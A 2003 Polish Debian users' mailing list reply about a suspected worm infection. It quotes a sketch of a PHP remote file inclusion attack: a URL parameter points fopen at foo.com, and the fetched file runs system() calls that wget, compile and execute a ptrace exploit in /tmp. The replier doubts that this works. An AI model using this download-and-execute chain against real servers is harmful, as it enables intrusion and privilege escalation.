Re[2]: Czy ja mam worma?

To: debian-user-polish <debian-user-polish@lists.debian.org>
Subject: Re[2]: Czy ja mam worma?
From: BadBorys <j.unk@poczta.fm>
Date: Mon, 28 Apr 2003 21:18:50 +0200
Message-id: <[🔎] 19682511805.20030428211850@poczta.fm>
Reply-to: BadBorys <j.unk@poczta.fm>
In-reply-to: <[🔎] 20030427135738.GE30339@ciacho.pl>
References: <[🔎] 20030426110152.GC21575@ciacho.pl> <[🔎] Pine.LNX.4.44.0304270135440.26704-100000@wspinaczka.net> <[🔎] 20030427135738.GE30339@ciacho.pl>

Witaj Tomasz,

W Twoim liście datowanym 27 kwietnia 2003 (15:57:38) można przeczytać:

TTC> Juz skasowalem raport w ktorym mialem to opisane.
TTC> ale mniej wiecej:
TTC> na stronie jest sobie fopen($filename.$prefix)
TTC> wejscie na strone &filename=http://foo.com/exploit&prefix=txt
TTC> a w pliku na http://foo.com/exploit.txt:
TTC> system("uname -a");
TTC> system("wget http://foo.com/ptrace.c";);
TTC> system("gcc -o /tmp/str ptrace.c");
TTC> system("/tmp/str");

Cos mi tu nie gra. Nie twierdze, ze php nie jest 'expoitable', ale na
pewno nie jest to takie proste. Bo niby dlaczego *otwarcie* jakiegos
pliku (nawet na zdalnej maszynie) mialoby spowodowac jego
*wykonanie*??

-- 
Pozdrowienia,
 BadBorys                            mailto:j.unk@poczta.fm



----------------------------------------------------------------------
Wiadomosci dnia w portalu INTERIA.PL >>> http://link.interia.pl/f1715

Reply to:

Follow-Ups:
- Re[3]: Czy ja mam worma?
  - From: Leaf <leaf@cyb3r.org>

References:
- Re: Czy ja mam worma?
  - From: "Tomasz T. Ciaszczyk" <ciacho@ciacho.pl>
- Re: Czy ja mam worma?
  - From: Mirek Grochowski <mgroch@wspinaczka.net>
- Re: Czy ja mam worma?
  - From: "Tomasz T. Ciaszczyk" <ciacho@ciacho.pl>

Prev by Date: Re: moduły po instalacji debiana 2.4
Next by Date: Re: Sendmail
Previous by thread: Re: Czy ja mam worma?
Next by thread: Re[3]: Czy ja mam worma?
Index(es):
- Date
- Thread